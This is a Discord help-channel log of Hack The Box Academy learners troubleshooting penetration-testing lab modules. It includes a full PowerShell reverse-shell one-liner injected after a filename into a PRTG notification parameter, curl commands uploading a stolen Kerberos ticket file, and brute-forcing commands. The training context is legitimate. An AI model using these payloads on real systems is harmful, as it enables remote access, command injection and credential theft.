#modules

in this case since it's a windows machine

i wouldn't say exclusively

lots of commands take full filepaths

hi guys. i jsut got the student premium for HTB. Doing the SOC path. is the rdp in windows section really slow? or is it just my pc

shouldn't be

An sttings that i might need to change?

are you using xfreerdp?

try change the vpn server

not sure what you mean by rdp being slow but i assume you are referring to the network itself, if you are having a bad connection this might be the cause, maybe try lowering colors (i know remmina supports that)

I am very new to htb so i am not sure. I just spawned the target they gave me, and used remina to enter the ip for the rdp machine

are you using pwnbox?

try xfreerdp

see how that works

okay. will do that. Thanks

Working with IDS/IPS
Snort Rule Development

There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];

I've downloaded the wireshark file but i'm not really sure to understand what I should be looking for. Can someone give me a hint

I am super glad to be here I have done 44 of these modules... looking forward to the discussion!

Currently working on the cpts path, nowhere close to finished but after I would like dive more into iot, radio/wireless. Are there any modules that go over that? I did a search and only saw some modules cover the topic but im unsure if there is a module dedicated to it? If not any ideas where I could find more info on these topics

there's no real module dedicated to that topic

the topics covered in academy are more related to web/system hacking not IoT hacking

Still feeling stupid and unable to get it to work!

Ahh I see thank you for the info

MODULE: ATTACKING WEB APPLICATIONS WITH FFUF -> In the GET-Parameter fuzzing there is an assumption that the parameter we are fuzzing for is set to the value "key". Is this for the sake of the lesson? Or should I be aware of how to discover the value of the parameter I am fuzzing for as well?

I can get them to connect both ways but can't then run RDP on either!

the value is arbitrary. you're just trying to probe a different response from the web app

you'll also learn later in the module how to fuzz for values

Understood. Appreciate u

Can anyone help me with "Find out which domain the server belongs to." from the enumeration module. I tried many things and nothing is working??? What THM is looking for???

well we can't help with THM stuff

if you mean HTB generally the domain is something.somethingelse

i.e. google.com would be the domain

better tell what things you did

I understand, but nothing is working. Anyway I will try in another place.

also "from the enumeration module" doesn't help if you're doing htb academy

there's a handful of "enumeration" modules

hahahhaa

sometimes i feel like it's the exact opposite

i think the same

but usually they're very patient

it very much depends

there's two things that bug me: Poorly phrased questions - and a clear unwillingness to learn

Any help on the apocalypse challenge for noobs? Most of these are really like Got me lost not sure if it’s a riddle or wants me to do something

#1204440084867325982

if you're in the second camp of a clear unwillingness to learn - my patience will run out quick and I will tell you you're SOL and move on

I will generally try and help rephrase a question if it's at least somewhat understandable

considering that English isn't many people's first language some minor differences do happen

i.e. 'make' being used for 'completing'

that makes sense

but if you're literally copy/pasting the question without providing info on what you've done, it doesn't help anyone to troubleshoot with you

and i mean with not for

like if you copy/paste a verbose error that is very specific about what it's expecting/wanting then -- yeah that's on you

i think sometimes people forget that there is the aspect of you actually doing things
like your example copy and pasting a verbose error message and asking what to do, in that moment i think they're too caught up in following instructions

tunnel-visioned is the phrase i'm looking for

well it's not really that

it's moreso copy/pasting the question with "I'm not sure what to do"

which isn't helpful for anyone in helping diagnose either a tool or skill issue

Were you actually able to get it to work?? I tried your Suggestions and also googled a ton but it just wont run

i see

Yes I was

that's understandable

You also have to install python2 pip with setup.py prior I think

sudo apt install python2 should install python2 just fine iirc

i think there was some part in the Learning Process module that talked about asking good questions

and pip is good for installing a bunch

most people don't know how to ask good questions

it's a suprisingly uncommon skill

i.e. "X isn't working" isn't descriptive; "I tried to do X with Y options and it's not working"

Detection & Analysis Stage (Part 1)
At this point, we have created processes and procedures, and we have guidelines on how to act upon security incidents.

i dont really know where "processes" came from, i guess the word policies and procedures fit better ? or i dont know "processes" meaning. Perhaps it is a typo and instead or "processes" is supposed to be "policies"?

can sometimes lead to "just reset the lab and it should work"

it's basically a series of steps

i'm not sure that "policies" would be a better word choice in this case

processes is the right word here

Has anyone here completed the "intro to network traffic analysis" module???

.

you literally just asked - you don't need to bump

and i'm sure plenty have but that's not your core question, is it

yep

in future: just ask your question

i'm bumping this question

you don't need a leading question to ask a question

let me revise it a little

Could be stupid by why exactly do we use these 2 ip's

I understand the concept

just not where these 2 ip's came from

the first one is your tun0 ip the second is the target IP

or more specifically it's your ip; imo they should change the command to be -i tun0

in the "intro to network traffic analysis" module, actually, i've been trying to complete that guided lab in there but while using the xfreerdp, i get a pop up in the machine asking for a password for "mrb3n"?? i've tried using my vm password and still failing to get authenticated.

because your vm password isn't that password

then what is it

i'm sure the question might provide credentials

whattt

that makes a bit more sense but what exactly is the tun0 ip? and the 2nd one is the ip for my vm?

usually in a little text above the question

I get that it's intercepting the information between my ip and the target ip when I do the ncat connection

but how exactly do I find/get my tun0 ip

tun0 ip is the IP assigned to your tun0 interface; the second one is the target/victim machine that's spawned with "Click here to spawn target system!"

ip a

Thanks Ill try again. I do have python 2 installed already. Will check again

that cant be right for the 2nd ip being the target machine

it is

my target ip is different

well yes

because the examples don't use the active target

no but during the active portion of the lab the command still worked

they use a general one

in the question? ofc since most moachines have diff IP. and they put that one just as a general one

I didn't swap any of the ip's out

yet I still got the flag just fine

perhaps you got lucky and your spawned target matched the IP of the examples

which can happen

most likely

you have to know how to adapt commands to suit your needs

so for future ref, do "ip a" to get mine, then just swap the other for the target

Are the chances of that occurring really that high?

@fathom pendant i have DM you... plzz check

you won't always be able to just copy/paste commands without modifying them

no

Yeah I know that

just wondering why this one worked out lol

in future: ask before dming

don't just DM then ask

yes. most commands dont require your own IP tho. so you need to understand what comnmands do and change the stuff according to your needs

yee

I will 1000% ignore requests

Thanks guys :)

I also haven't done that module @naive imp so I'm making a general assumption based on other modules

so I can't help you further beyond "read the section"

bruhhh

but usually credentials you'd need are provided by the section

Howdy,
Recently joined the Discord and I have been stuck for a few hours on the Login Bruteforcing HTB Academy module. I'm in the process of completing the Login Form Attack section and have used Hydra (correctly I think). I grabbed the creds, attempted to login via the website's GUI and the it doesn't seem to be working. Tried reproducing my efforts with the creds with cURL and that didn't seem to work as I was hoping it'd provide the HTML source with the HTB{} flag. Any/all advice would be great!

an example of provided credentials from the attacking common services module

not worked till now bro

anyone plzz help me with this... i've tried using the password provided above the question also

If you are using the password that the module provides you, then the error is elsewhere. Refresh the module and ensure you are still logged in.

you have to use the username and password provided

not just the password

hello im stuck in the question in AD module of living of the land section : RE: Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

i did the UAC =2 to get disabled account

the creds provided definitely works, what's the command you used to connect and what's the error?

just to be clear, you are using these credentials, right

any hint for LockTalk API: step 2

what module is this related to?

if it's for an apocalypse ctf challenge: #1204440084867325982

and net [users found] but got no luck

you should mostly be able to use the provided ldap query

you might need to change a couple parameters i.e. OU stuff

yes

So I got the virtualenv for python2 I think and installed the requirements.txt successfully, but I still get an error that it can't find the yaml module..? Did you have that issue as well?
ImportError: No module named yaml

Edit: Seems to work now, needed to specify the full path to python2 binary

but i am not talking about the terminal... i am talking about the authentication for "mrb3n"

For the purposes of htb academy, when I find all these from an axfr, do I have to put each IP in /etc/hosts for them to work properly for directory enumeration?

why are you trying to authenticate as mrb3n

bcoz its not connected to any network by default and we have to connect it to the "ENS224" network right??

no

also dig has nothing to do with directory enumeration

I know that

it has to do with subdomain enumeration

but directory enumeration is another tool entirely

I meant hitting the other zones with something like dirsearch

i already found a user called || Betty Ross|| but when doing || net user /domain 'Betty Ross'|| is says username not found

all you have to do is open Wireshark and capture on the ens224 interface

I'm not sure what you're getting at, connect via rdp, use wireshark

because that's not their username

Can anyone kindly provide me with any insight? I might be missing something so small and need to step away to see the full picture

"Using what you learned in this section, try attacking the '/login.php' page to identify the password for the 'admin' user. Once you login, you should find a flag. Submit the flag as the answer. "

also i cant see any ens224 interface on the wireshark on the default page which shows eth0, any, tun0 and other interfaces??

Hi all, need help with NTLM Relay attacks - skill assessment with the question: Submit the password of the SQL user 'sqlftp'. I have access to Backup01$. I looked in the ShareBackups and nothing interesting there. Also have use ticketer.py to request a ticket with Backup01$ nt hash for -spn cifs/sql03.inlanefreight.local Administrator but doesnt seem to work. Any help greatly appreciated it.

did you rdp?

check what you can access with the creds you have, look inside shares

found it... after i reopened the wireshark

im stuck dont know how to find username

tried some combinations with thay filter ldap feature but i think im lost

samaccountname iirc

oh

you can also likely make an educated guess based off of other users so far

Well I'm assuming he's on Kali and Kali has python but the pip is sometimes broke depending on versions

¯_(ツ)_/¯

So you have to install python2's pip to install something (I think this is just what worked for me)

Works fine on pwnbox for that module so

yes

i just didnt want to dig through all the usernames, especially the module want you to use that ldap filter

The only clear text password i have is for sql_ftp_test. I do have the sam dump of Backup01$. Can I DM you?

but my bad i didnt see the samaccountname attribute in the section example

anyways thanks :3

that password is useful, look inside the shares of sql01

aa ok

on the nmap scripting engine module I could use a nudge in the right direction, I've done the command
sudo nmap 10.129.33.55 -sV -p 80 --script vuln
I just need a nudge on what im looking for exactly

Hi

even using grep to look for a "flag" hasn't yeilded results

I do get responses in response to the search but

eternalblue doesnt works on windows 10 right

The flag command challenge is broken will not accept any answer but north from there it gives options but only lets you choose a single answer all result in death if I were able to choose a different path but I can’t so I’m stuck it’s broken for sure

but old version of windows 10 hv it or not

Also support chat not responding

Given that it ask you to choose North south east and west but you can only choose north is why it’s broken because north leads to death

nvm figured it out :3

I'm in module Password Attacks, Section Pass the Ticket (PtT) from Windows. I cannot RDP with the credentials that's given. Does anyone know if this is an error or am I doing something wrong?

wrap it in single quotes

^

So like "/u:administrator" etc.

$$ is a variable that calls the PID of the shell you're in

ohh

Yeah, I can see how that messes it up

No, like /u:'username' /p:'password'

Thanks a lot! I'll give it shot

Single quotes tells bash to interpret it as a string and not a variable

That did the trick. Thanks guys ❤️

Also known as a string-literal

I'll for sure note that down. Wasn't really aware of that

Is anyone available to help with the Attacking Common Services - Easy lab?

Be more specific

heyo, quick question. Im doing the ips/ids evasion hard and when i do a scan all of the ports not open end up not being shown. im using 'sudo nmap <IP> -sS -sU -Pn -n -F' just wondering if im messing up somehow

I cleared it with that .exe for lazange, it was literally in the directions. I wasted so much time not paying attention. My fault. Thanks bro

I posted more details yesterday and my post was removed because it's a t2 module. I was told to only talk about anything over t0 in DM.

You can still ask questions

I've got a password with a "!" in it and bash doesn't like it. Quotes don't seem to work. How do I get bash to read it as just another character?

Single quotes doesn’t work?

I get a syntax error

Show me

Oh wait, that was double quotes. I'll try single

I am trying to use the WHERE command to find the flag and it just returns a blank page.

Single doesn't work either

Show me

Actually this is a new and exciting error

||xfreerdp /u:fiona /p:'{redacted}' /v:10.129.200.178 -r disk:linux='/home/silvance'
[14:04:16:498] [2110006:2110006] [ERROR][com.winpr.commandline] - Failed at index 1 [/u:fiona]: Invalid sigil||

Can you try without the r disk?

Huh, it works without the r disk. Never had an issue with it until now

I use /drive personally

I'll try that

So /drive:/home/silvance,KALI_SHARE

I use drive as well 😛

Gotcha

xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer /dynamic-resolution like that

If you use discord search, there should be some hints on what to do

I have, and none of them seem to work. I even tried getting the output from the mySQL server as someone posted the direct link and still get NULL as an answer.

my next page is the easy lab, when i reach it, ill help you if I can

My inner onion is battling through the yearly Academy subscription, or making labs by myself (4x cheaper and "lifetime"). Working as admin for now

I do enjoy the Academy model, but upfront cost will cut my finances for 6-10 months

you don't have to get annual, if you're planning to do 1 path, getting 2 months of plat is substantially cheaper

Flip the order

Why

It's sharename,path

Not path,sharename

For /drive:

Nah, works for me

Huh. Neat I guess it just works that way

It’s how I have it in my notes, and I see it in my command history

I mean I guess it works in both ways

As either share,path or path,share

The man page only shows share,path

🤷🏼‍♂️

¯_(ツ)_/¯

have you tried using them as login creds?

That's a strange looking set of creds

well its under admin pass

True.

I'll delete the photo just in case

Guys you know in the AD Enum & Attacks module. Whenever it says to RDP into MS01 and then ssh into a 172. address as htb-student. I always get permission denied. I've worked around it so far. But is it me or is it goosed? Is there supposed to be a trick to this? I just ssh htb-student@172.16.5.225 with the usual PW.

Miscellaneous misconfigs section at the moment

The 172 host is a completely separate host

I think I'm not getting this

The ms01 host creds is the usual windows htb-student creds

The rdp is fine

172.16.5.225 is a separate linux host

So forward the port or tunnel or something?

If you want to interact directly with it via your own machine

It just says open a PS console and ssh in so I thought it was just simple

You can also open a powershell terminal and ssh to it

Thats the thing it won't let me do

Note the creds are gonna be the usual linux ssh creds

Not the windows one

😢

I believe at the top of the section it gives you creds

Username:password

will htb ever fix the connection issues on the targets ? while the content is amazing i'm starting to get annoyed by the connection issues, keep swapping vpns around to sort this thing out is annoying

Can you link the section I can't find it

Its just worked

Some targets may not respond to pings

Who turned it on

No one

heyo noobie question im sure but does this -"Not shown: 869 closed tcp ports (reset), 128 filtered tcp ports (no-response)"- happen when you scan because of the IDS/IPS blocking it or is there something else? When i use a version scan i get more ports listed out than if i just do an -sS or -sU

I swear I've typed and pasted the same creds about 2000 times

i'm supposed to rdp into the target, rdp doesn't work either 🙂

Sometimes the windows labs need a few minutes to start up

Thanks for your help

Like up to 10 minutes in some cases

That makes sense. I've been needing ages for windows hosts to boot

i've had it running for longer untill connection droped.. then restarted it still not working, and no, first time when i rdp into it it did not any extra minutes 🙂

Reset target. Wait a few minutes. Scan with nmap to see if it's open

otherwise switch vpn regions, try again, make sure you use tcp ¯_(ツ)_/¯

did i not say that i am doing that and i am just getting annoyed about doing that every now and then ? oh wait, you just sound like every generic customer support that ignores everything the customer says and gives generic advice lol 🤣

Don't gotta be a dick dude

If you're consistently having issues contact support

There's really not much that we can do to magically suggest a fix for your issue, aside from asking you to do what's worked for us

i'm not, but you try to answer a question that's not for you.

i've also not asked for a fix 🙂 obviously again you just ignore what i said

only asked if htb will ever fix those issues

I'm just saying complaining on the discord does nothing

As they seem intermittent, it doesn't look like they can narrow down a full fix

there you go, this was a good answer to give straight away

:x

Here you go being a condescending prick about it

🤣 i've yet to make you in any way while you already called me in a bad way twice

When you ask a question or make a statement in this channel it's generally assumed you're asking for help

Therefore I read it as you were asking for advice on how to resolve the issue presented

honestly sounds like an isp issue, i'd call them. i've never had issues with htb. it's been the most stable platform out of any i've tried.

Occasionally one or more of the regional servers shit the bed and die out

yeah i have seen that for sure

For a bit it was really bad due to upstream providers having network issues

can't be my isp as you can see from the picture i'm using the attack box 🙂

i didn't scroll up that far tbh, only read the last few msgs

But now it's just returned to the intermittent issues of "sometimes it just no work"

can i ask less module related questions here about personal vm setup/command stuff or is there another place?

using the attack boxes just because of those connection issues but yes i would love to use my vm...

#1024429874246590575

ty

I'm stuck at this part of the Attacking Common Services - Hard lab. I know I need to impersonate but I don't fully understand this process

Hello, i got stuck on Password Attacks
Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

I got the username and password but when i log to smb i cannot get the flag.
The dir and ls command are disabled.

I dont know what to do

The error is related to the linked server, are you sure that linked server is correct

I'm not. This is my output.

It doesn't show \SQLEXPRESS at the end

hello, how do you check what groups a specific user in?

I thought I was getting closer with the impersonation error, but I'm still not sure on the syntax of the command

Follow the syntax from the mssql section

I did, but it gives an IP address. I didn't get an IP address

Specifically regarding accessing linked servers

I'm reading through the "Identify Linked Servers in MSSQL" section right now

You don't always need an ip

In this case the linked server is the fqdn

New error. Another step in the right direction maybe

the AD module, powerview, netexec all can be used to do that

What's prompting you to select @@WINSRV02, and @@SQLEXPRESS

I thought the example they gave was a "fill in the blank" style command

No

Oh. Well that explains a lot

@@severname pulls the server name of the host of the dB, @@version pulls the version of the db

sorry, another question about this IPS/IPD evasion module. im trying to run the ncat with port 53 bound but im getting a
libnsock mksock_bind_addr(): Bind to 0.0.0.0:53 failed (IOD #1): Permission denied (13)
Ncat: TIMEOUT.

The command theoretically succeeded but it didn't do anything

Sudo

Anyone know if Linux fundamentals page 18/scheduling has an error in the question?

! ty

Whenever you see permission denied: Sudo

im stuck on kerberoasting from linux section : What powerful local group on the Domain Controller is the SAPService user a member of?

ah

check the output of getuserspns

^

It's really that shrimple

bruh

hahahaa i hate when i miss this small details

imma take a break :3

Forest for the trees

I got the right answer after failing a while. Then I looked up the answer. I noticed in the write up of it, that they had a different file name in their command to get the right answer.

There's no official writeup of academy modules

anyone having issues reaching the spawned machines? I can't reach them even within pwnbox

nvm it's working now

You need to specify the port after --source-port

sudo ncat -nv --source-port <your_port> <ip> <connection_port>

ah yea i didnt include it here sorry but i have

It can take a minute to connect and give you the answer

times out unfortunately

Try respawning the target and trying again

yep that did it ty

Is it allowed to stream while doing a hack the box challenge?

If you're referring to Academy content, only Tier 0 content may be streamed
If you're referring to content on the main platform, retired content may be streamed
More comprehensive breakdown: https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

thanks a lot

ffs tried soooo many wordlists on SMTP till i saw the one in resources....

I've done that way too often. Sitting through 14 million words with rockyou.txt.

Hi freinds! I'm on the basics path login brute force 2nd skills assessment (Service Login portion) and running into a wall on hydra brute forcing a web form. Im either getting [ERROR] the target is using HTTP auth, not a web form, received HTTP error code 401. Use module "http-get" instead or I get all falst positives if I use http-get. Any pointers?

DoS!

xd

I could really use some help from some File Transfer pro's. I have to upload this file krb5cc_647401106_I8I133. I've tried python server and scp but with no luck. I have root access on the target.

you're transferring from linux to linux or what?

Yes, exactly

why doesn't your python server work

python3 -m http.server

then just wget <ip>/file.txt

Yeah, 2 sec I can send screenshot

you can also try netcat

good idea! i'll try that out

172 is probably the wrong address

htb ip's start with 10.10

they use 172 for their separate vlans

When i do it with the target address it refuses the connection instantly

show that command

ye 2 sec

looks like there's a pivot

what's tun0 ip on the left box

oh i see it

what about the right box

yeah that might be what's causing the issue. I've pivoted from normal user to root.

yeah right box is my host and the left is my target

yeah so i don't think the victim box is on the same network as your attacker box

they'd need to be on the same network to do that

True that. My brain is on 20% capacity, been battleing with this section for a few hours now

i'm not sure of the context of how you're connected to the left box, but they're not on the same network it seems

It's the Pass the ticket for Linux Section in the Password Attack module

how are you connecting to the left box

First I pivoted from the user David, then to Carlos, then to svc and then I escalated privs on svc to root. So I've jumped quite a lot around in the system. And everything is pretty much pass the ticket.

well it sounds like the easiest way would be to xfer that file back to david's computer

then you can access it from your vm there, although somehow i doubt this is the intended way in the module just because it sounds so convoluted

but i haven't seen that module so i have no idea

yeah, that sounds like the "easiest" way to do it, even tho it feels a bit of scope for this module

that doesn't answer how you're connecting to the left box

switching user != network pivot

switching user

something's not right and i agree with xre0us

somehow you got into a private network

yeah, the question is how you're doing that

switching user wouldn't help you to pivot in the network

you must have connected to a computer which had access to another network, and you used it as a jumpbox to the other vlan

I searched after a step by step guide, since i cant really explain it well. https://www.youtube.com/watch?v=qteCKiTkn_g&ab_channel=MonSi

alright hold up, before we get lost in the weeds here, why do you need to xfer that file. what is the question in the module asking you? i highly doubt you need to get this back to your vm.

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

you don't need to take the file back to your box to do that

Yes, because I gotta cahnge the settings of the KRB5CCNAME env variable to use Impacket with Proxychains and Kerb auth

It also says in the section Finally, we need to transfer Julio's ccache file from LINUX01 and create the environment variable KRB5CCNAME with the value corresponding to the path of the ccache file.

...so you're using proxychains?

you're on linux01 aren't you? isn't that the box on the left?

yes

and yes

so you're on the machine it wants you to set the env on...

idk actually, i dont know the full context of that module.. xre0us probably has better answers for you

if you have a kerberos ticket on the machine you should be able to just use it there

Yeah, but they make it seem that you have to export the file to your host and even mentions that I have to check the file transfer if I don't know how to transfer it.

But thanks a lot for your input, I really appreciate it!

export is a linux command

they're probably not talking about actually transferring the file

for example

that's an example

That might be it, I'll try it out!

Module: OSINT: CORPORATE RECON
Section: Locations

Question asked:
What are the city's coordinates where one of the company's offices, "inlanefreight.com" has its headquarters in Germany/USA/UK? We suggest to use https://latitude.to for this. (DD Coordinates format: 00.00000 0.00000)
HInt: If the settings are correct and the search is performed correctly, Google will display the coordinates in large print in the first position.

What i have done: I looked at the website and used the locations of the three cities mentioned on the offices page but these answers were rejected.
I don't see any other page.
The entity is not on Google Maps.
The google terms i used don't produce any location other than the page or one from cutestat.

Any hints or methods to get to the answer? Can DM me too.

how were you able to transfer svc_workstations's ccache?

I found the user by doing crontab -l and located the svc_workstations._all.kt and then I executed keytabextract.py and got the NTLM and then cracked it.

i believe the scenario here is that he has root access on a remote linux box and has obtained julio's kerberos ticket. all he needs to do is use the ticket to get julio's file... that's what it sounds like at least

yeah how were you able to transfer it out

I didn't transfer it out

ah

xre0us he was confused, the module says to export it, and it means the export command in linux, not to file transfer.

Finally, we need to transfer Julio's ccache file from LINUX01 and create the environment variable KRB5CCNAME with the value corresponding to the path of the ccache file.
Note: If you are not familiar with file transfer operations, check out the module File Transfers.

NCbirdman, In Linux, the export command is used to set an environment variable... so you need to set that ticket as the KRB variable and connect...

nah you need to transfer it out, there's no impacket on the first target so you need to do it in your own vm

Yes, I know. But it explicitly says I gotta transfer it out

I just did the whole thing again

'transfer it from linux 01..' --- to where?

you're root on the linux target yes?

Yes, I am

alright, run an upload server in your own vm, python3 -m uploadserver <port>, then in the linux host, upload it like this

curl -X POST http://ip:port/upload -F 'files=@fileName'

that was his problem, he pivoted remember lol

he said this is the question it's asking "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio." ---- this doesn't say anywhere he needs to xfer the file.

there's no pivot, it just doesn't show the 10.129.x.x ip for some reason on the linux box, even though that's how you ssh in, and running the python server doesn't open it on the 10.129.x.x ip

Oh ma god

you need to transfer the file, again there's no impacket on the first target so you need to ptt from your own vm

it worked

ahh ok

Thanks guys, u are the best

good job lol sorry i probably caused more confusion more than anything

now that I think of it, the ssh probably go through a router or something

No worries, I explained it so badly

the upload server worked?

Yes, it did. First try even

nice

Maybe I can actually go to bed tonight

all good, I also forgot and had to do the whole thing again

All of us learned something new today

hi guys i am stuck on this in web information gathering module at active subdomain information. any help?

digging around will help find the answer

not everything will be on the initial domain

yah i am digging

subdomains exist

yeah i found sub dom list

some can be dug through, some cannot

should i dig all

i mean that's up to you; but the answer lies inside

hm

(yes that was an intentionally phrased hint)

find that and finish that section

thanks.

https://tenor.com/view/hack-the-planet-gif-15624885

Where’s the flag?

target is not spawning. is the server down or something?

gotta be same for me

This is bad, sometimes I am busy or down. Now I get the time, server is down.

check tom user mailbox bro

maybe view source? also oof mobile

lmao ong

same module next section no idea what to do

@fathom pendant

Read the section and follow the provided steps

There's a reason they give you a vHost to start with, like a benchmark

Hi, win privilege escalation, kernel exploit. I get meterpreter shell, but cant execute any commands, the reason timeout. Its trouble with connection or i missing something?

hm

Hi everyone I think the answer is a no but just want to confirm - do the HTB Academy specific targets have an AU region option or are they exclusively in the US & EU?

getting a lot of lag and it's just a bit painful from down here 😢

I don't see any AU, only for the labs

thanks, not just me being silly then 😄

You may have to look at the code or use developer tools to find out what's going on in the background. This may influence your decision!

Why am I getting 54 correct password when perform in brute force using hydra. according to the HTB im suppose to get 0 for it's only to verify that the default passwords and username do not work
any help to put this matther at rest will be appreciated

after :F= looks weird. can you show a pic of the webpage's msg about failing a login?

Their are none unfortunaty

well, you set up your hydra so it's looking for a failure message

it's load and return the same page

so probably has something to do with that

remove the :F and everything after?

makes sense thanks

go

Does anyone knw how to change the payment method I tried to change but it ain't showing any other option than credit card

so i am trying to use whatweb to pull information on "dev.inlanefreight.local" the module states this is a vhost but only gives me an ip address that just defaults to a inlanefreight.local page. i cannot access the "dev." portion of the website what so ever even when adding it to my /etc/hosts file

what am i doing wrong

Look at the format of the other entries, yours is wrong

It's ip domain/site

/sigh

Thank you once again @fathom pendant

Quick question, I'm working on https://academy.hackthebox.com/module/113/section/1094 (PRTG Network Monitor) and following the instructions to gain remote code execution through notifications. Seems like I'm unable to get my reverse shell working though. Wondering if anyone could double-check my syntax and offer any hints.

Here's the Parameter value:

test.txt; powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('MY_IP_HERE',44
3);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

(As a side note, I was able to complete this through other means, just looking to understand what's up.)

Hello help me please how to extract logon;;password plz??

Elevate privilege

😵‍💫

very nice man !

Completing 100% path is tiring when there are windows machines taking a lifetime to spawn/acess , struggling with Citrix Breakout section due to net issues.

Try running PS as admin

Fianly I see, Just exec with prog in c:/ at the admin

Support me ahah helpppp xD

Any idea what's causing these issues with reverse port forwarding? I don't have to get a successful connection to answer the questions and move on, but I'd at least like to get the connection so I understand the concept.

Hi guys, I am trying to do the nessus module in academy but not exactly sure how to connect to nessus

can I ping someone about it ?

I am on the Skill Assesment part

Ive completed relitavely the same amount only have windows priv esc left but thats seems long as hell so ive been putting it off

but not sure how to use nessus via the provided instructions

Read it again it walks you through it

Nothing has been announced yet. But the modules in the Academy give us hope for such a certificate. It has not been said when it will be released.

there are no news yet about a new cert. However there have been some more modules in the direction of advanced AD attacks and there are at least 3 modules regarding assembly/bof that are not yet part of any path

Take a look at the release dates of CBBH and CPTS. CBBH = March 22, CPTS = September 22
This year CWEE was published in February. If HTB does the same as in year 22, then we can expect another certificate in the fall.
I am sure that we will receive further information on HTB's social media channels in good time.
So keep your eyes open and check the social media channels regularly

hello im having problem differenciating between object ACE type and ActiveDirectoryRights , when we talk for example about GenericAll , its and ADright given right? but what is the object ACE type

im stuck at ACL enumeration section : What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)

i used bloodhound found a two ADrights to GPO management group but it seems its not the answer

i used the PS command but seems to be freezing and unresponsive

I think your payload is wrong. You're getting a shell session but it gets closed.

I'm having trouble myself with the module ICMP Tunneling with SOCKS, it looks like the tunnel is very unstable (kali / virtual machine / pwnbox).

If I am right, then HTB still has a while to develop and release more modules

Can I ask someonw about the server-side attacks skill assessment? It seemed a bit too easy?? Just want to make sure I didnt skip anything

Hi fellas! I could use some help.
Module: Password Attack
Section: Pass the Ticket (Linux)
Question: Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

I found the keytab for Linux01 as shown in my screenshot. I've tried to do Pass The Hash with NTLM and I've also tried to crack it but with no luck.
Can anyone nudge me in the right direction?

just pth?

What's wrong with this command:

xfreerdp /u:'htb-student' /p:"HTB_@cademy_stdnt!" /v:'10.129.223.195'

Try single quotes on password

Not sure if it makes a difference, just how I always do it

I've tried with different variations of the username. Like LINUX01$, linux01@inlanefreight.htb etc.

And I don’t use quotes on ip

the user might not have winrm rights, also you're supposed to target the DC

Linux01$ is a machine acc

Okay, I'll try something different

I was getting tunnel visioned

woo just completed the knowledge check on getting started, that was a fun root

I'll delete this because there are too many spoilers
Take another close look at the log file. Your payload cannot work. It breaks the log file

oh ok

yea the log file does not record past that request

Take a look at how the log file is structured and then take another look at how your payload is structured. Then you will see what I mean

thanks for the pointer

You will probably have to restart your target. Because with your payload you have broken the log file and thus made a further payload impossible.

I still haven’t found :/

It is a Tier IV module and therefore costs 1000 cubes. As with all other modules, you get 20% of the cubes back on completion. So 200 cubes

Take another look at the keywords in the module. Then think about where the payload is transferred. Then you will also know which keyword you need to work with to find the string.

HEllo

What I don't have a access ?

https://academy.hackthebox.com/module/67/section/603

Hey Guys, on this module I already have 2 of 3 questions. https://academy.hackthebox.com/module/116/section/1165

The last one is "Use the discovered username with its password to login via SSH and obtain the flag.txt file. Submit the contents as your answer." I already have the user name, and I've runned the resource password list provided in the module on Hydra, medusa, and msfconsole to crack the password and it never finds it. I've tried for days now. What am I missing something or what else should I try?

Hi Guys, I need your help: Passwords attack modules

Find the user for the WinRM service and crack their password:

When I use this command :
crackmapexec winrm 10.129.x.x -u ./username.list -p ./password.list

It takes many times, because it will attempt 1 password from password.list for all users from username.list before moving to the next password :

WINRM 10.129.x.x 5985 WINSRV [WINSRV\john:123456
WINRM 10.129.x.x 5985 WINSRV [-] WINSRV\dennis:123456

So I think that I can get a hint for a username from service NFS (111,2049)
sudo mount -t nfs -o vers=3,tcp,nolock 10.129.x.x:/J..x ./nfs_local

ls -la nfs_local
ls: cannot open directory 'nfs_jnfs': Permission denied`

ls -ld nfs_local
drwx------ 2 4294967294 4294967294 64 Jan 6 2022 nfs_local`

I'am stuck here, when I create a user with that GUID, this doesn't work, also with the command sudo su I don't have access permission

I 'am Going down a rabbit hole? Any hint will help me to figure out that. Thank You!

Try adding -windows-auth or something like that [I forget the flag for crackmap]

Every user can be bruteforced using the provided wordlist/mutated list

Unless you're referring to the skill assessment?

Hi I have started the Footprinting medium lab but I guess I'm taking the wrong path. I have started to enumerate the different service with nmap. Find a nfs share with some tickets trascription and gathere the user&pwd in it. Still I have the feeling to be on the wrong path. Any suggestion?

You're close, look at the available services and think what you can use those credentials for

If you obtained credentials, you're generally on the right path

89% is impressive im at 23.
tell me, do you feel deadly yet?

Thank @fathom pendant for the boost confidenc ! I'll keep trying so.

Can I dm you ?

Hey I m 21, I'm fine at the moment

@fathom pendant can you help me please with this exercice ; https://academy.hackthebox.com/module/67/section/603

Haven't done this module

sure

I don't access this flag but I do all the commands in the course

==> commands :

Python3 does not like rpivot.

I'm not sure how to complete this module now

okay I test

Nothing

Hello, did anyone encounter an issue related to VPN connection?
"sitnl_send: rtnl: generic error (-101): Network is unreachable"

I can't attach screenshot

Read and follow #welcome

Hey I find finally

but I have a second question ; https://academy.hackthebox.com/module/67/section/605 for this exercice where is capcom.sys????

2?

